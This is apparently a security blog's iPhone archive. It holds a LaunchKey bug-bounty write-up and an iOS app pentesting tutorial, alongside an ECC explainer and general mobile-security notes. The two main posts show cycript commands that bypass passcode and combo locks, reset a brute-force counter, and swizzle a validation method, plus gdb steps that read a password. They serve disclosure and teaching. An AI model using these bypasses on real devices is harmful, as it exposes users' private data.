RSS

Category Archives: iPhone

Get Practical mobile forensics book for just $5 now!

5 Dollar - Social Media

 

Packt Publishing will be celebrating the holiday season with $5 offer.  From Thursday 18th December, every eBook and video will be available on the publisher’s website for just $5 till 6th January. Here is the link to grab a copy of Practical mobile forensics book for just $5!!

 

Posted by on December 24, 2014 in iPhone

1 Comment

Win A Free Copy of Packt’s Practical Mobile Forensics

We are pleased to announce that Packt publishing is organizing a giveaway especially for you. All you need to do is just comment below the post and win a free e-copy of Practical Mobile Forensics. Two lucky winners stand a chance to win an e-copy of the book. Keep reading to find out how you can be one of the Lucky One.

Practical Mobile Forensics cover

Overview of Practical Mobile Forensics

  • Clear and concise explanations for forensic examinations of mobile devices
  • Master the art of extracting data, recovering deleted data, bypassing screen locks, and much more
  • The first and only guide covering practical mobile forensics on multiple platforms

How to Enter ?

Simply post your expectations from this book in comments section below. You could be one of the 2 lucky participants to win the copy.

DeadLine:

The contest will close on 09/25/2014. Winners will be contacted by email, so be sure to use your real email address when you comment!

Update – 09/26/2014 : The contest is over. Will announce the winners shortly.

Update – 09/28/2014 : Lucky winners are listed below. Congrats.

Simon Lang
Pralhad

 

Posted by on September 17, 2014 in Android, iPhone

22 Comments

Tags:

LaunchKey Mobile Vulnerabilities : Bug Bounty Experience

Below are the vulnerabilities which I have found in the LaunchKey iPhone application.

Insecure Storage – passcode & auth token are stored in clear text

LaunchKey app allows its users to set a passcode to protect their information. This passcode is stored in clear text in the keychain, which can be obtained using keychain_dumper tool.

launchkey pin in plaintext

The app also stores the authentication token in clear text in the keychain.LaunchKey Auth Token in cleartext

Passcode Lock Bypass

Once a passcode lock is set, whenever the app is relaunched it prompts for the passcode. This passcode lock can be bypassed by manipulating the iOS runtime with cycript. Before manipulating the runtime, I have decrypted the app using clutch and obtained the class information using class-dump-z.

Steps followed to bypass the passcode lock:
1. Connected to the iPhone over SSH.
2. Launched the app and noticed that it prompts for a passcode.
LaunchKey pin lock
3. Attached LaunchKey process to cycript and obtained the view controller instance of current displaying screen. 
$cycript -p LaunchKey
>v=UIApp.keyWindow.rootViewController.visibleViewController
>v
<LKPinViewController: 0x1f5d5d00>
4. Looked at the class dump for LKPinViewController interface and didn’t find any interesting methods/variables.
@interface LKPinViewController : LKLockViewController <UITextFieldDelegate> {
	NSString* pinNumber;
	BOOL creation;
	NSString* firstPin;
	int tries;
	UITextField* pinDigitOneTextField;
	UITextField* pinDigitTwoTextField;
	UITextField* pinDigitThreeTextField;
	UITextField* pinDigitFourTextField;
	UIView* pinView;
	UIImageView* background;
	UIButton* cancelButton;
	UILabel* pinLabel;
	UINavigationBar* navigationBar;
	UIImageView* lkNavLogo;
	UILabel* notMatchLabel;
	UITextField* pinField;
}
@property(retain, nonatomic) UITextField* pinField;
@property(assign, nonatomic) __weak UILabel* notMatchLabel;
@property(assign, nonatomic) __weak UIImageView* lkNavLogo;
@property(assign, nonatomic) __weak UINavigationBar* navigationBar;
@property(assign, nonatomic) __weak UIView* pinView;
@property(assign, nonatomic) __weak UIImageView* background;
@property(assign, nonatomic) __weak UITextField* pinDigitFourTextField;
@property(assign, nonatomic) __weak UITextField* pinDigitThreeTextField;
@property(assign, nonatomic) __weak UITextField* pinDigitTwoTextField;
@property(assign, nonatomic) __weak UITextField* pinDigitOneTextField;
@property(assign, nonatomic) __weak UIButton* cancelButton;
@property(assign, nonatomic) __weak UILabel* pinLabel;
-(void).cxx_destruct;
-(void)viewDidUnload;
-(void)didReceiveMemoryWarning;
-(void)dealloc;
-(void)cancelButtonTouched:(id)touched;
-(void)shakeTheView;
-(void)viewDidLoad;
-(void)animationDidStop:(id)animation finished:(BOOL)finished;
-(void)showConfirmFields;
-(void)savePinToKeychain:(id)keychain;
-(BOOL)textField:(id)field shouldChangeCharactersInRange:(NSRange)range replacementString:(id)string;
-(id)initWithLocking;
-(id)initWithVerification;
-(id)initWithRemoval;
-(id)initWithCreation;
-(id)initWithNibName:(id)nibName bundle:(id)bundle;
@end

LKPinViewController inherits LKLockViewControllerHence, methods in the parent class (LKLockViewControllerclass) can be invoked from the child class (LKPinViewControllerinstance. So looked at the class dump for LKLockViewController interface and noticed an interesting method pinIsValid.

@interface LKLockViewController : GAITrackedViewController {
	NSNumber* AppId;
	BOOL removing;
	MBProgressHUD* hud;
	BOOL verifying;
	int yOffset;
}
@property(retain) MBProgressHUD* hud;
@property(assign) int yOffset;
@property(assign) BOOL verifying;
@property(assign) BOOL removing;
@property(retain, nonatomic) NSNumber* AppId;
-(void).cxx_destruct;
-(void)pinIsValid;
-(void)showTemporaryError:(id)error;
-(void)unpairDevice;
-(void)updateWaitingAPN:(id)apn;
-(void)didReceiveMemoryWarning;
-(void)viewDidLoad;
-(id)init;
-(id)initAsCombo;
-(id)initAsPin;
-(id)initWithNibName:(id)nibName bundle:(id)bundle;
@end

5. Invoking the pinIsValid method directly from the the cycript prompt, logged me into the app without entering the passcode.

&nbsp;&gt; [v pinIsValid]
launchkey pin bypass

 

Combination Lock Bypass

LaunchKey app allows its users to set a combination lock as an alternative to the passcode lock. Once a combo lock is set, whenever the app is relaunched it prompts the user to enter combo code to unlock. This combo lock can be  bypassed by manipulating the iOS runtime with cycript.

Steps followed to bypass the combo lock:
1. Connected to the iPhone over SSH.
2. Launched the app and noticed that it displays the combo lock.
LaunchKey combo lock
3. Attached LaunchKey process to cycript and obtained the view controller instance of currently displaying screen. 
$cycript -p LaunchKey
> UIApp.keyWindow.rootViewController.visibleViewController
> l=_
<LKComboLockViewController: 0x1e1c9680>

4. Looked at the class dump for LKComboLockViewController interface and noticed an interesting method comboDismissed.

@interface LKComboLockViewController : LKLockViewController {
	BOOL creation;
	int tries;
	UIImageView* background;
	UINavigationBar* navigationBar;
	UIImageView* lkNavLogo;
	UILabel* combinationLabel;
	UIButton* cancelButton;
	UILabel* detailsLabel;
	LKCombinationLock* combo;
}
@property(retain, nonatomic) LKCombinationLock* combo;
@property(assign, nonatomic) __weak UILabel* detailsLabel;
@property(assign, nonatomic) __weak UIButton* cancelButton;
@property(assign, nonatomic) __weak UILabel* combinationLabel;
@property(assign, nonatomic) __weak UIImageView* lkNavLogo;
@property(assign, nonatomic) __weak UINavigationBar* navigationBar;
@property(assign, nonatomic) __weak UIImageView* background;
-(void).cxx_destruct;
-(void)didReceiveMemoryWarning;
-(void)comboValid;
-(void)shakeTheView;
-(void)invalidComboTry;
-(void)invalidComboSet;
-(void)cancelButtonTouched:(id)touched;
-(void)comboDismissed;
-(void)comboUnlocked;
-(void)comboSetAndDismissed;
-(void)comboSet;
-(void)firstComboSet;
-(void)combosDoNotMatch;
-(id)initWithVerification;
-(id)initWithLocking;
-(id)initWithRemoval;
-(id)initWithCreation;
-(void)viewDidLoad;
-(id)initWithNibName:(id)nibName bundle:(id)bundle;
@end

5. Invoking the comboDismissed method directly from the the cycript prompt, logged me into the app without entering the combo lock code.

> [l comboDismissed]
launchkey combolock bypass

 

Passcode bruteforce limit bypass

When a passcode lock is set, LaunchKey app provides an option to unpair the device after 10 failed passcode attempts. The app is keeping track of the number of attempts in a variable. This bruteforce restriction can be bypassed by changing the variable value in runtime using cycript.
LaunchKey unpair after10

 

Steps followed to bypass the bruteforce limit:
1. Connected to the iPhone over SSH.
2. Turned on PIN lock and selected unpair after 10 option.
3. Closed and reopened the app. It prompted for a passcode.
4. Entered wrong passcode for 9 times.
5. Attached LaunchKey process to cycript and obtained the view controller of currently displaying screen.
$cycript -p LaunchKey
> UIApp.keyWindow.rootViewController
> n=_
> n.visibleViewController
> v=_
 <LKPinViewController: 0x1f5d5d00>
6. Looked at the class dump for LKPinViewController interface and noticed an interesting variable tries.
@interface LKPinViewController : LKLockViewController <UITextFieldDelegate> {
	NSString* pinNumber;
	BOOL creation;
	NSString* firstPin;
	int tries;
	UITextField* pinDigitOneTextField;
	UITextField* pinDigitTwoTextField;
	UITextField* pinDigitThreeTextField;
	UITextField* pinDigitFourTextField;
	UIView* pinView;
	UIImageView* background;
	UIButton* cancelButton;
	UILabel* pinLabel;
	UINavigationBar* navigationBar;
	UIImageView* lkNavLogo;
	UILabel* notMatchLabel;
	UITextField* pinField;
7. Printed the value stored in tries variable and confirmed that it is the variable keeping track of passcode failed attempts.
&gt; v.tries
 &nbsp;9
8. Changed the value to 0.
> v.tries=0
Now you can try another 9 attempts. This would allow to bruteforce the passcode without unpairing the device.


LaunchKey security team is very friendly and they fixed all the vulnerabilities within short time.  I have received 800$ in total for all the vulnerabilities as a bounty. Happy Hunting 🙂

 

Posted by on May 28, 2014 in iPhone

7 Comments

Tags: , ,

Elliptic Curve Cryptography: A Case for Mobile Encryption

It is needless to start this article explaining about the rise of mobile devices in the last few years. We all know about how smart phones have swept the world. But with mobiles you always look for concepts or solutions which are computationally cheap. For example, Android OS uses a dex compiler to convert the Java Byte code to .dex files before compiling them. Why? Because dex files are optimized code for low memory and low processing systems. Similarly when it comes to encryption on mobile devices we look for solutions which are computationally cheap and yet secure. ECC (Elliptic Curve Cryptography) provides exactly the same. This article explains about the why and how ECC is different from the other encryptions.

What is the need for an alternative encryption scheme when you have RSA?

Mobile phones have 2 main limitations:

  1. Computational limitations – Because the processors used on mobile devices are less capable compared to the ones used on a desktop system. Although there are a few devices which use dual core/quad core, most of the mobiles in general are not equipped with these kinds of CPU’s. 2.
  2. Battery Life – Mobile devices run throughout the day and battery consumption is one of the important aspects for the success of a device. The more computations a device has to perform the more battery life is consumed.

Consider a normal user who visits a banking site on his mobile device to transfer money to his friend. A low processing powered mobile device would struggle with the 1024 bit computations of RSA. With major financial institutions, the smallest key size allowed for RSA is 1024 bits. This activity not only takes time to complete but also eats into the battery life of the device.

What is ECC?

Elliptical curve cryptography (ECC) is a public key encryption technique based on elliptic curve theory that can be used to create faster, smaller, and more efficient cryptographic keys. So let us analyze the ECC algorithm by considering 2 factors – Security & Efficiency.

Security:

When we talk about public key encryption algorithms, the first things that come to mind are RSA and Diffie-Hellman. Both these algorithms use 1024 bit keys for major transactions. But it’s important here to note that NIST (National Institute for Standards and Technology) has recommended 1024 bit parameters only till the year 2010. The RSA algorithm is into its 40th birthday and probably regarded as the standard public key exchange on the Internet. After 2010, NIST believes that the existing systems be upgraded to a different set up to provide more security (although we no longer believe NSA or NIST :)). One option is to simply increase the key size used with these algorithms. However you are not quite sure as to what is the safe key size. Other option is to switch to a different set up which is more secure. ECC here comes to rescue. ECC generates keys through the properties of the elliptic curve equation instead of the traditional method of generation as the product of very large prime numbers.

RSA’s security is based on the principle that factoring is slow and hard i.e. it is difficult to factor a large integer composed of two or more large prime factors. With the improvements in technology, the gap between factoring and multiplying is slowly reducing. In the coming years, certainly this is bound to break. Switching to a larger key size is one option but it would only give the breathing space for a few more years.

An elliptic curve is represented as a looping line intersecting two axes. ECC is based on properties of a particular type of equation created from the mathematical group derived from points where the line intersects the axes. Multiplying a point on the curve by a number will produce another point on the curve, but it is very difficult to find what number was used, even if you know the original point and the result. For elliptic-curve-based protocols, it is assumed that finding the discrete logarithm of a random elliptic curve element with respect to a publicly known base point is infeasible –this is called as the elliptic curve discrete logarithm problem or ECDLP. Equations based on elliptic curves have a characteristic that is very valuable for cryptography purposes: they are relatively easy to perform, and extremely difficult to reverse. Despite almost three decades of research, mathematicians still haven’t found an algorithm to solve this problem. To state in simple words, for numbers of the same size, solving elliptic curve discrete logarithms is significantly very much harder than factoring. ECC was developed by Certicom, a mobile e-business security provider. RSA has been developing its own version of ECC. Other manufacturers, including Motorola, Cylink, Siemens, and VeriFone etc have already included support for ECC in their products.

The curious case of Angela Merkel’s phone tapping 🙂

A few months back, the news that German Chancellor Angela Merkel’s phone was tapped by the US government has created quite a scene. Amid this controversy there was also news that Merkel used 2 phones – one BlackBerry (encrypted) and the other Nokia (not encrypted). In September, new government phones which were manufactured by the Canadian company BlackBerry were delivered to all government officials (including Merkel) after being updated by the German company Secusmart. They contain a special encryption card that scrambles speech and data before transmitting it. So this Secusmart card used the Elliptic curve cryptography to encrypt and decrypt the mobile speech. And just because it is encrypted doesn’t mean its safe. It all depends upon how difficult it is to crack the key.

Efficiency: 

In terms of efficiency, ECC wins the race by large margin. The below table explains it all. The following table gives the key sizes recommended by the National Institute of Standards and Technology to protect keys used in conventional encryption algorithms like the (DES) and (AES) together with the key sizes for RSA, Diffie-Hellman and elliptic curves that are needed to provide equivalent security.

crypto key sizes

For instance to protect 128-bit AES keys using RSA or Diffie-Hellman you need to use 3072-bit parameters. The equivalent key size for elliptic curves is only 256 bits. Also, as the symmetric key size increases, the corresponding RSA/Diffie Hellman key size increases at a much higher rate compared to ECC key size. This is particularly a strong case for moving towards ECC on low powered environments like mobile devices, wireless devices, smart cards etc.

Real word ECC – is it safe?

The reports leaked by Edward Snowden suggested that Dual Elliptic Curve Deterministic Random Bit Generation (or Dual_EC_DRBG) had been included as a NIST national standard due to the influence of NSA, which had included a deliberate weakness in the algorithm and the recommended elliptic curve. RSA Security then issued an advisory recommending that its customers discontinue using any software based on Dual_EC_DRBG. Wikipedia mentions “Implementations which used Dual_EC_DRBG would usually have gotten it via a library. At least RSA Security (BSAFE library), OpenSSL, Microsoft, and Cisco has libraries which included Dual_EC_DRBG, but only BSAFE used it by default. According to the Reuters article which revealed the secret $10 million deal between RSA Security and NSA, RSA Security’s BSAFE was most important distributor of the backdoored algorithm. There was a flaw in OpenSSL’s implementation of Dual_EC_DRBG that made it non-working outside test mode, from which OpenSSL’s Steve Marquess concludes that nobody used OpenSSL’s Dual_EC_DRBG implementation”. All these point out the dark side of the NSA 🙂

However there are several different standards which propose ways of selecting curves for use in elliptic-curve cryptography (ECC). Each of these standards tries to make sure that the elliptic-curve discrete-logarithm problem (ECDLP – the problem of finding an ECC user’s secret key, given the user’s public key) is difficult. Below are some of the standards in use:

  • ANSI X9.62
  • IEEE P136
  • SEC 2
  • NIST FIPS 186-2
  • ANSI X9.63
  • Brainpool
  • NSA Suite B
  • ANSSI FRP256V1

Hence selecting the right curve and parameters is also important to ensure real world ECC security. More information can be found at the link: http://safecurves.cr.yp.to/.

To summarize,

-> ECC employs a relatively short encryption key. It is faster and requires less computing power than other first-generation encryption public key algorithms such as RSA, Diffie-Hellman. For example, a 160-bit ECC encryption key provides the same security as a 1024-bit RSA encryption key and can be up to 15 times faster, depending on the platform on which it is implemented.

-> Extremely helpful for use on low memory and low computing environments such as mobile devices, wireless devices etc.

-> Elliptic curves are supported by all modern browsers, and most certification authorities offer elliptic curve certificates.

Elliptic curve cryptography has proven to be a promising solution for the implementation of public-key cryptosystems. As widespread use of the internet and mobile devices continues to increase, transferring data the information with less computation and in a more secure manner has been the primary focus. With smaller key sizes and lower processing requirements, elliptic curve cryptography serves the purpose on mobile devices.

 

Posted by on February 28, 2014 in Android, iPhone

1 Comment

Tags: ,

Penetration testing of iPhone Applications – Part 6

In the First part of the article, we have discussed about the iPhone application traffic analysis. Second partThird part and Fourth part of the article covered in-depth analysis of insecure data storage locations on the iPhone. Part 5 covered runtime analysis basics with Cycript. In this part we will take a look at in-depth analysis of application runtime using cycript and GNU debugger.

Runtime analysis with Cycript:

With cycript we can hook into the application runtime, access & modify the instance variables, invoke the instance methods and override the existing methods. In the previous article we have discussed on how to access instance variables from the application runtime. In this article we will take a look at how to invoke & override the application instance methods. 

Invoking the instance methods with Cycript:

Cycript allows invoking the application instance methods directly from runtime. This helps in bypassing the validation mechanisms implemented in applications. For the demo, I am using a photovault application and you can download the IPA here. Photovault application will help to keep the photos securely by protecting with a passcode. When the application is launched for the first time, it prompts the user to set a passcode. Later on, the user has to enter the correct passcode to view the private photos. Below steps explains how to bypass the photovault passcode protection using cycript.

1. Launch the photovault application and it prompts for a passcode.

photovault login screen

2. Connect to the iPhone over SSH and find the application process id using ps ax command.

photovault ps id

3. Hook into the application process using cycript –p [PID] command.

hook with cycript

4. On the cycript prompt, grab the application delegate instance using UIApp.delegate command.

photovault UIAppdelegate

5. Obtain the photovault class dump using class_dump_z. Search the class dump for AppDelegate & look for the @interface of it.

photovault classdump

6. Looking at the class dump reveals an interesting method called – pinLockControllerDidFinishUnlocking. The method does not take any arguments. So we can invoke it directly using [UIApp.delegate pinLockControllerDidFinishUnlocking] command. 

method invocation with cycript

7. Bingo!. It logs you into the application without entering the passcode and gives access to the private photos.

photovault passcode bypass

Overriding the instance methods with Cycript:

The objective-C runtime allows modification & replacement of the existing methods code dynamically. This technique is known as method swizzling. For this exercise, I have created a demo application called HackTest and you can download the IPA here. HackTest application prompts the user for a password and displays the welcome screen upon entering the correct password. Below steps explains how to bypass the HackTest password validation mechanism by overriding the existing methods using cycript.

1. Launch the HackTest application and it prompts for a password.

hacktest password

2. Enter any value (ex: abcd) and click on Enter button. It displays invalid passcode message.

hacktest invalid passcode

3. Connect to the iPhone over SSH and grab the application process id using ps ax command.

hacktest ps id

4. Hook into the application process using cycript –p [PID] command.

hacktest-hooke with cycript

5. On the cycript prompt, grab the application delegate instance using UIApp.delegate command.

hacktest UIAppdelegate

6. Obtain the HackTest class dump using class_dump_z. Looking at the class dump of HackTest application reveals an interesting method called validatePasscode. The method takes no arguments and returns a Boolean value. The application probably uses this method to check for a valid passcode and takes the authentication decision based on its return value. Now using the method swizzling technique we will modify the validatePasscode method to always return true.

hacktest classdump

7. validatePasscode method is declared in the ViewController interface and the ViewController instance is present in the AppDelegate interface. So grab the ViewController instance using UIApp.delegate.viewController command.

hacktest viewcontroller

8. To override the validatePasscode method, run the below command.

UIApp.delegate.viewController->isa.messages[‘validatePasscode’]=function (){return 1;}.

It overrides the function to always return 1. isa is a pointer to the class structure and gives access to the method implementation.

cycript metod override

9. Bingo!. It logs you into the application without entering the password and displays the welcome screen.

hacktest passcode bypass

The above examples shows how one can easily manipulate the runtime and circumvent the security checks implemented in iOS applications using cycript.

Runtime analysis with gdb:

Gdb – gnu debugger is a powerful tool to analyze and alter the runtime behaviour of iOS applications. Debugging is an interactive process and allows setting breakpoints in the application execution which in turn gives more control on the application. For this exercise, I am using a photovault application and you can download the IPA here. The photovault application keeps the private photos securely by protecting with a password. When the application is launched for the first time, it prompts the user to set a password. Later on, the user has to enter the correct password to access the private photos. Below steps explains how to grab the photovault password from runtime using gdb.

1. Launch the photovault application and it prompts for a password.

photovault-3 password

2. Connect to the iPhone over SSH and find the application process id using ps ax command.

photovaut-3 ps id

3.  Attach gdb to the application process using gdb –p [pid] command.

photovault-3 gdb hook

gdb attaches to the process and reads the symbols for shared libraries.

photovault-3 gdb

4.  Obtain the photovault class dump using class_dump_z.  Looking at the class dump reveals an interesting method called btnLoginClicked. This method takes no arguments and probably gets invoked upon pressing the login button. Let’s inspect the method by setting a breakpoint.

photovault-3 classdump

5. Set a breakpoint for the btnLoginClicked method using b or break command. A breakpoint pauses the program execution whenever a certain point in the program is reached.

gdb breakpoint1

6. At this point the application gets freezed and does not accept any input. In order to continue the execution type c in the gdb prompt.

gdb continue execution 1

7. Enter some value in the photovault password and click on login button.

photovault-3 enter password

8. As expected it hits the breakpoint in gdb and the application execution is paused.

photovault-3 breakpoint

9. At this point, disassemble the btnLoginClicked method to look at the next executable instructions using disas or disassemble command. As iPhone binaries are compiled for ARM processors, gdb displays the ARM based assembly instructions.

gdb disassemble

10. In the disassembled code you will see a lot of dyld_stub_objc_msgSend instructions. Objective-c is based on the messaging framework, hence methods aren’t invoked or called, instead messages are passed between objects using objc_msgsend method. An attacker can tap into these messages and look for sensitive information. On gdb terminal, we can setup breakpoints for all the objc_msgsend calls and inspect for the important information. As there are too many objc_msgsend calls in the disassembly, it would be difficult & time taking process to inspect each and every call. In the btnLoginClicked disassembled code, dyld_stub_objc_msgSend located at 0x0000618a is followed by a cmp instruction (conditional execution) which probably means it checks for a login state. So let’s set a breakpoint at 0*0000618a and inspect the objc_msgsend call.

photovault-3 breakpoint2

11. Continue the application execution and it hits the breakpoint.

gdb continue execution2

We can inspect the breakpoint by looking at the register values. To see register values at the breakpoint use info reg command. iPhone uses ARM based processors which contain 15 general purpose registers (r0 – r14), program counter (r15) and current program status register (flags). The standard ARM calling conventions allocates the 16 ARM registers as:

r0 to r3 – holds argument values passed to a method (r0 is also used to store the return result from a method)
r4 to r11 – holds local variables
r12  ( ip) – Intra-Procedure-call scratch register
r13  ( sp) – stack pointer
r14  (lp) – link register
r15  (pc) – program counter

ios - gdb registers

objc_msgsend method contains 3 arguments –

Receiver (r0): A pointer to the called object. That is, the object on which the method should get invoked. x/a $r0 command is used to examine the address located at r0 and po $r0 command is used to print the object located at r0.

photovault-3 r0 reg

Selector (r1): String representation of the method that handles the message. x/s $r1 command is used to examine the string value stored in r1 register.

photovault-3 r1 reg

First argument passed to the objc_msgsend is stored in r2. Po $r2 command is used to print the r2 register value.

photovault-3 r2 reg

Looking at the register values explains that r0 contains the original password and the application is trying to compare it with the user entered value in r2. Bingo ! Now we know the password and can log into the application directly.

photovault-3 password bypass

The above example shows how one can easily manipulate the application runtime using gdb. The application security can be improved further by adding anti-debugging techniques which would prevent malicious users from using a debugger. Though they won’t provide 100% security, it works as an additional layer of security and delays the attacker attempts.

Penetration Testing For iPhone Applications is going to be covered in a series of articles. In the Part 7, we will take a look at push notifications, URL schemes and few automation tools.

 

Posted by on September 12, 2013 in iPhone

6 Comments

Tags: , , , ,

Mobile Security Basic Challenges

Data stored on the device is worth more than the device

Introduction:

The above quote might well apply to desktops and laptops as well. But it’s highly probable that your mobile device might be used by someone or lost, compared to your laptop/desktop. This fact changes the entire scenario. With the advent of mobile phones and smart phones, the game has enormously changed in the last few years with respect to the ease with which tasks are accomplished. This article focuses on various security related aspects which are involved with increased use of mobiles. Before jumping into the security concerns here is a small introduction about how the mobile technology has slowly taken over the whole world.

The first hand-held mobile device was demonstrated by two Motorola employees in 1973. After 10 years i.e. in 1983, the first mobile was commercially made available. From 1990 to early 2000’s, mobile phones spread rapidly and people used it mainly for the purpose of communication. In the last 10 years, with the rapid increase in internet usage, mobiles started accommodating the features of personal computers and finally took a new shape with the introduction of ‘smart phones’. Today mobiles have penetrated into each and every corner of this world, serving variety of tasks including mobile applications, GPS navigation, storage, entertainment etc. In this article we will mainly focus on mobile applications and their security concerns.

Mobile applications:

Mobile phone applications extend the functionality of mobile phones.  Everything is readily available and the tasks which were previously accomplished in a desktop world are now available on mobile just with a single click. People now use mobile applications to assist them in several day to day activities and enterprises are in a mad rush to develop the mobile apps to reach out to the users in a better way.

What is a mobile app anyway?

Mobile app is a software application developed to run on mobiles. Each mobile operating system has a corresponding distribution platform from where these mobile apps can be downloaded. For example, Android app can be downloaded from Google Play and iPhone apps can be downloaded from Apple App Store.  So an individual or a company can develop a mobile application and upload it to the distribution platform and advertise it so that users can download and use the same. The general demand and the ease of development of these mobile apps have resulted in their enormous growth. So these days we have a mobile app for everything – for example mobile banking, online shopping, ticket purchases, games etc. The real question is how secure are these mobile apps which deal with sensitive information. So let’s have a look at general mobile security related issues which are common to all the platforms.

Mobile Security:

Mobile security is increasingly playing a crucial role as more sensitive and personal information is now stored in the mobile phones. Security is now considered as crucial and central aspect these days during the unveiling function of any Smartphone. Moreover with the corporate world embracing the mobiles in a big way the focus is very much on the security of these devices. Attacks which are seen on PC’s are now slowly making their way on to the mobiles. At a higher level mobile related attacks can be classified into below categories:

Attacks based on OS – Exploiting the loopholes present at OS level. So the concerned vendor has to release a patch to fix the issue.

Attacks based on Mobile apps – Exploiting the security holes present in mobile application which is a result of poor coding/development.

Attacks based on Communication networks – Attacks on GSM, Wi-Fi, Bluetooth etc.

Malware related attacks – Malware attacks on mobiles have been rising continuously. A successful attack can steal the photos on your mobile, hijack the camera click, hack the emails, and delete the files on the mobile.

Let’s now move on and talk a little bit more about the current issues related to mobile security. The following is a list of main issues in the field of mobile security. Please note that this is not the complete list and not in any particular order. Let’s have brief look into the security issues which revolve around the mobile devices currently.

Physical Security:

Physical security is one of the biggest challenges to the designers of mobile phones and their applications. Mobile phones are lost, stolen and borrowed (many times by others to make a call or view the photos). When a mobile device is lost, the real concern is not about the cost of the mobile but the amount of sensitive data that is present on that mobile. Imagine the personal phone which is provided by your employer for enterprise activities falls into the hands of wrong persons and he tweaks with the data present in it. Imagine a situation where your neighbor asks your mobile for a quick call and then downloads a malware on to that phone (by the way it just takes a few seconds to do that). These issues are rather less when you are dealing with a desktop world because it is unusual that you lose your desktop machine. So the bottom line is mobile applications & systems are to be designed assuming that untrusted parties would be granted access to the phone.

No such thing as ‘logging’ into mobile:

In a desktop world, each user supplies his username and password and logs into the system where he gets access to his environment. So each user has a different environment and thus the privileges and data that each user has are separated. This ensures that one account doesn’t have access to the data of other account. But this concept is not valid in a mobile world as there is nothing like logging into a mobile for each user. So sharing and accessing of data between applications is a big concern.

Secure storage of data on the phone:

In addition to the sensitive files present on your mobile (photos, contacts, documents etc.), mobile applications also store sensitive information like authentication tokens, password related files etc. It’s very important that these files are to be protected. One way is by storing them securely on the mobile so that they are not accessible or usable. For instance password files must be stored in encrypted fashion so that even after accessing those files they are of not much use.

Mobile Browsing Environment:

In a mobile browser, it is not possible to see the entire url or sometimes see any url at all. This paves the way for hackers to unleash the phishing related attacks. So the display space on a mobile device increases the possibility of phishing attacks by manifold. The fact that people are more inclined to follow links on mobile blindly adds to this problem. So in this mobile browsing environment it’s an impossible task to expect a normal user to verify every link before following it.

Isolating the applications:

The range of mobile applications that we install today are diverse – social applications to connect to family and friends, enterprise applications to manage your work, banking applications to transfer funds, gaming applications for entertainment and many more. So it’s very important that a social networking app does not gain access to your corporate app or a gaming app does not gain access to the banking app. In short, application isolation is crucial. This would depend on the factors like OS permissions in different platforms and how these permissions are granted. Exploiting the existing mechanisms to gain unauthorised access is one area where hackers are actively targeting.

Update Process:

Operating systems require patches/updates to resolve any security issues that are discovered. OS like Windows look continuously for updates and install them. But when it comes to mobile OS the patching process is not as simple as that. When a bug is reported in a particular OS, the OS vendor comes with a patch. He then publishes this information to all the carriers (like AT&T, Sprint, and Airtel etc.). Now these carriers will not be proactive in installing these updates because there is every chance that during patching processes other applications might break down. Hence if these carriers find such cases with the patching, they hold it on for some time without applying the patch/update immediately.

Proper Authentication:

Authentication process is very important in mobile phones because as explained earlier it just a matter of seconds before someone asks your phone and does something malicious and you have no idea about it. In the cases where a company offers extranet access to its corporate network through mobiles, there should be a means of Multifactor authentication because if that mobile falls into the hands of wrong guys it would expose the internal network of the company. Multifactor authentication needs to be implemented and improved in order to solve many issues.

Poor coding of mobile apps:

Poor coding or development practises of the developers could lead to severe consequences. For example: hard coding of sensitive data like passwords, transmission of information in unencrypted channel, weak server side controls, improper session handling etc. Many of the vulnerabilities that apply to web will apply to mobile applications as well.

Bluetooth & other Attacks:

Bluetooth and other drivers pose as a security threat to the overall security posture of the mobiles. We have seen in the past about the vulnerabilities reported on Bluetooth and other third party drivers. Since these have system access, by exploiting a critical vulnerability an attacker might even get access to everything on a mobile. So even if the underlying operating system has excellent built in mechanisms which does not easily grant system access, these vulnerable third party drivers would be a set back at any time.

Malware Attacks:

Many surveys point out that malware attacks on mobile phones is on the rise. If you are someone who browses through tech news every now and then you must have seen some news about android phones getting infected by malware in a big way. Malware is something which harms the system in which in resides. With new computing environment new class of threats in new forms arise. It is very important that these issues are addressed proactively leveraging from our experiences of 90’s. Reports have also been published which forecast the situation to be worse in the coming year and some quote 2013 will be the ‘year of mobile malware!’.

Jail breaking the phones:

Many users jailbreak the phone in order to run applications for free or to run applications which are not authorized by the vendor. Jail breaking a phone would remove the restrictions imposed on a device by its vendor. Hence jailbroken devices are more susceptible to computer viruses and malware. Downloading the apps from an unauthorised third party store would only put your mobile at risk.

New features like NFC pose a serious threat:

NFC – Near Field Communication is a technology that allows you to beam the content to nearby devices and lets you use your mobile as a wallet to purchase items. It has been demonstrated in Black hat conference that by brushing a tag with an embedded NFC chip over an android phone, it is possible to take over the control of the phone. So with increase in technology, you will need to address more complex attack scenarios. In future, many more advanced technologies like these are expected to come and they bring a whole lot of new issues to address.

User awareness:

User awareness is major factor in controlling many of the attacks and when it comes to mobiles it’s even more important. There are many things from the user end which he should be careful about – Having passcode for the device, look out for the permissions granted to application. A gaming application may not need access to dialling), not following the links sent by unknown persons.

As the time progresses, the industry has more challenges to face and answer. For instance new ideas pose a security threat like BYOD – Bring Your Own Device where employees bring their personally owned mobiles devices to their work place. Since there are huge number of devices out there, each having its own security issues, it’s a huge task for any organisation to guarantee corporate equivalent of privacy on these devices. These are some of the basic issues that are involved in current mobile security. If anyone of you has more points to make, I sincerely request you to comment and share with the community.

 

Posted by on July 21, 2013 in Android, iPhone

2 Comments

Tags: , , ,